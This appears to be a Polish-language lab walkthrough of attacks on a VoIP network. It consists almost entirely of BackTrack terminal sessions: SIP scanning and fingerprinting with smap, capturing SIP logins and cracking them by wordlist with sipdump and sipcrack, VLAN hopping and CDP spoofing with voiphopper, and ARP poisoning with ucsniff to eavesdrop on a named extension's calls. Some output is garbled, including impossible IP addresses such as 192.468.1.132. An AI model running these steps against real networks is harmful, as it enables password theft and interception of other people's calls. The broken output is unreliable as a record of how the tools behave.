Faza skanowania i enumeracji

root@bt: /pentest/voip/smap # ./smap -O 192.168.1.130
smap 0.6.0  mn@123.org http:/www.sitename.com
192.168.1.130 : ICMP reachable, SIP enabled
Best guess (55% sure) fingerprint:
	Asterisk PBX (unknown version)
	User Agent Asterisk PBX 1.6.0.15-FONCORE-r78
1  host scanned, 1 ICMP reachable, 1 SIP enabled (100.0%)


root@bt:/pentest/voip/smap# ./smap 192.168.1.104
smap 0.6.0  http://www.wormulon.net/
192.168.1.104: ICMP reachable, SIP enabled
1 host scanned, 1 ICMP reachable, 1 SIP enabled (100.0%)


root@bt:/pentest/voip/smap# ./smap 192.168.1.130/24
smap 0.6.0  http://www.wormulon.net/
192.168.1.20: ICMP reachable, SIP enabled
192.168.1.22: ICMP reachable, SIP enabled
192.168.1.0: ICMP unreachable, SIP disabled
192.168.1.1: ICMP unreachable, SIP disabled
192.168.1.2: ICMP unreachable, SIP disabled
192.168.1.3: ICMP unreachable, SIP disabled
...fragment usunity...
192.168.1.250: ICMP unreachable, SIP disabled
192.168.1.251: ICMP unreachable, SIP disabled
192.168.1.252: ICMP unreachable, SIP disabled
192.168.1.253: ICMP unreachable, SIP disabled
192.168.1.254: ICMP unreachable, SIP disabled
192.168.1.255: ICMP unreachable, SIP disabled

256 hosts scanned, 7 ICMP reachable, 2 SIP enabled (0.8%)


root@bt:/pentest/voip/smap# ./smap -O 192.168.1.104
smap 0.6.0  http://www.wormulon.net/
192.168.1.104: ICMP reachable, SIP enabled
best guess (70% sure) fingerprint:
  Asterisk PBX SVN-trunk-r56579
  User-Agent: Asterisk PBX

1 host scanned, 1 ICMP reachable, 1 SIP enabled (100.0%)

-----------------------------------------------------------------------------
Pozyskiwanie hase

root@bt:/pentest/passwords/sipcrack# ./sipdump auth.txt p auth.pcap
* Using pcap file auth.pcap for sniffing
* Starting to sniff with packet filter tcp or udp or vlan

* Dumped login from 192.168.1.130  ? 192.168.1.132 (User 100)
* Dumped login from 192.168.1.130  ? 192.168.1.132 (User 100)

* Exiting sniffed 2 logins


root@bt:/pentest/passwords/sipcrack# ./sipcrack auth.txt w wordlist.txt
* Found accounts
Num		Server		Client		User		Hash/Password
1	 192.468.1.132	         192.468.1.130	100	266985602b32305ac254d2087c...
2	192.468.1.132	         192.468.1.130	100	5241a520b547852e2581b2323a...
3	192.468.1.132	         192.468.1.130	100	e54b78d854126ba4587a4150b1...
Select which entry to crack (1 - 3)  : 1
* Generating static md5 hash. . .  cae5479224126b852e2581 
* Starting brute force against user 100 md5 (266985602b32305ac254d2087)
* Loaded wordlist:  wordlist.txt
* Starting brute force against user 100 md5 (266985602b32305ac254d2087)
* Tried 48 passwords in 0 seconds
* Found password:  123
* Updating dump file  auth.txt . . .done
--------------------------------------------------------------------------------

Przeskakiwanie VLAN-w


root@bt:~# voiphopper
voiphopper -i <interface> -c {0|1|2} -a -n -v <VLANID>
Please specify 1 base option mode:
CDP Sniff Mode (-c 0)
Example:  voiphopper -i eth0 -c 0
CDP Spoof Mode with custom packet (-c 1):
-D  (Device ID)
-P  (Port ID)
-C  (Capabilities)
-L  (Platform)
-S  (Software)
-U  (Duplex)
Example:  voiphopper -i eth0 -c 1 -E 'SIP00070EEA5086' -P 'Port 1' -C Host -L 'Cisco IP Phone 7940' -S 'P003-08-8-00' -U 1
CDP Spoof Mode with pre-made packet (-c 2)
Example:  voiphopper -i eth0 -c 2
Avaya DHCP Option Mode (-a):
Example:  voiphopper -i eth0 -a
VLAN Hop Mode (-v VLAN ID):
Example:  voiphopper -i eth0 -v 200
Nortel DHCP Option Mode (-n):
Example:  voiphopper -i eth0 -n


root@bt:~# voiphopper -i eth0 -v 20
VoIP Hopper 1.00 Running in VLAN Hop mode ~ Trying to hop into VLAN 2
Added VLAN 20 to Interface eth0
Attempting dhcp request for new interface eth0.20

eth0.20   Link encap:Ethernet  HWaddr 00:0c:29:84:98:b2
          inet6 addr: fe80::20c:29ff:fe84:98b2/64 Scope:Link
          UP BROADCAST NOTRAILERS RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:9 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:0 (0.0 B)  TX bytes:2274 (2.2 KB)
-----------------------------------------------------------------------------------

Podszywanie si pod adresy MAC w sieci VOIP


root@bt: #nmap 192.168.1.132
Starting nmap 5.51 (http://nmap.org) at 2013-08-06 14:28 
Nmap scan report for 192.168.1.132
Host is up (0.000028s latency) 
Not shown : 992 closed ports
PORT 		STATE 		SERVICE
135/tcp		open		msrpc
139/tcp		open		netbios-ssn
1433/tcp	open		ms-sql-s
9535/tcp	open		man
9593/tcp	open		cbas
9594/tcp	open		sgsys
9595/tcp	open		pds
MAC address : 00:15:DB:10:D4:B0 (Intel corporation)
Nmap done : 1 IP address (1 host is up) scanned in 1.53seconds


root@bt:/pentest/voip/ucsniff 8.10# ucsniff i eth0 T     
ucsniff 8.10 starting
Displaying the discovered targets list // Wywietlenie listy znalezionych celw
Extension  Name    IP             Protocol
100        User A  192.168.1.132  sip
102        User B  192.168.1.133  sip
Please select one endpoint (1 - 2) from the discovered targeted list // Prosz wybra jeden punkt kocowy (1-2) z listy znalezionych celw 
1
Target selected for input user eavesdropping. // Wybrano cel do podsuchiwania danych wejciowych uytkownika
100        User A  192.168.1.132  sip
Listening on eth0 ... (Ethernet)
Eth 0 00:0c:28:F7:6d:71 192.1683.1.133 255.255.255.0
Randomizing 255 hosts for scanning...
* |...................................................................................>| 100.00%
3 hosts added to the host list...
3 hosts saved to arpsaver.txt...
ARP poisoning victims // Ofiary zatruwania tablicy ARP
GROUP 1 : 192.168.1.132 00:15:DB:10:D4:B0
GROUP 2 : ANY (All of the hosts in the list)
Starting unified sniffing...
Warning : Please ensure you hit 'q' when you are finished with this program.
Warning : 'q' re-ARPs the victim. Failure to do so before program exit will result in DoS.
Listening for new calls to and from target User A (extension 100, IP 192.168.1.132) // Nasuchiwanie nowych pocze wychodzcych od docelowego uytkownika, jak i wchodzcych do niego 

-------------------------------------------------------------------------------------------------
